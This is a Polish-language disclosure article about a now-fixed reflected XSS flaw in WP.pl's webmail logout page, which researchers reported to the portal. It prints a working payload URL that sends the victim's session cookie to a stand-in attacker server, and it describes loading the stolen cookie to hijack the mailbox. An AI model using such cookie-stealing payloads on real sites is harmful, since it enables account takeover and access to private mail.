Była dziura, nie ma dziury – poczta.wp.pl

Swego czasu mrhack oraz Scooty odkryli poważny błąd w systemie pocztowym portalu WP.pl który umożliwiał przejęcie pliku cookies odpowiedzialnego za podtrzymywanie sesji konta pocztowego, dzięki czemu można było w łatwy sposób wykorzystać go do przejęcia sesji innych użytkowników, tym samym uzyskując dostęp do ich konta pocztowego.

Autorzy poinformowali portal WP.pl o dokonanym odkryciu po czym, w bardzo szybkim czasie, dostali odpowiedź na przesłaną informację. Aktualnie błąd ten już nie istnieje ale warto przedstawić więcej szczegółów technicznych.

Błąd ten polegał na tym, iż w adresie

http://profil.wp.pl/logoutmsg.html?komunikat=%3Cscript%3Ealert(document.cookie)%3C/script%3E

jako argument moża było podać dowolny łańcuch tekstu, który następnie był wyświetlany na stronie. Zatem w łatwy sposób można było przygotować odpowiedni kod napisany w JavaScript, a po uruchomieniu takiego adresu po stronie użytkownika, kod zostanie wykonany na jego komputerze. Ogólnie chodziło o to, aby przejąć plik cookie, który jest używany podczas sesji odbierania poczty. Można było to wykonać, w bardzo łatwy sposób. Mianowicie, wspomniany kod musiał przekierować użytkownika do skryptu np. cgi na komputerze atakujacego, który byłby odpowiedzialny za zapisywanie do pliku podany jako argument plik cookies. Zatem wystarczyło zdalnie „zmusić” użytkownika do wejścia na np. taki oto adres:

http://profil.wp.pl/logoutmsg.html?komunikat=%3Cscript%3Edocument.location.replace(‚http://jakis-serwer.pl/steal.cgi?’+document.cookie);%3C/script%3E

Jedynym problemem było to, iż przejęcie pliku cookies musiało nastąpić podczas, gdy użytkownik był zalogowany na końcie pocztowym. Przejęcie sesji nie nastąpiłoby również gdyby użytkownik ten wylogował się z konta.

Aby przejąc sesję, należało załadować skradziony plik cookie do przegladarki. Na przykład w Netscape wystarczyło odpowiednio zmodyfikować zapisany plik cookies, po czym można było wejść na adres http://poczta.wp.pl, by naszym oczom ukazał się panel obsługujący pocztę użytkownika.

Na zakończenie podam, iż istnieje jeszcze druga, podobna dziura w systemie pocztowym portalu WP.pl. Niestety autor nie chce udzielać szczegółowych informacji dotyczącej drugiej dziury, „ponieważ znów mogłaby zaistnieć dziwna sytuacja” – podaje mrhack.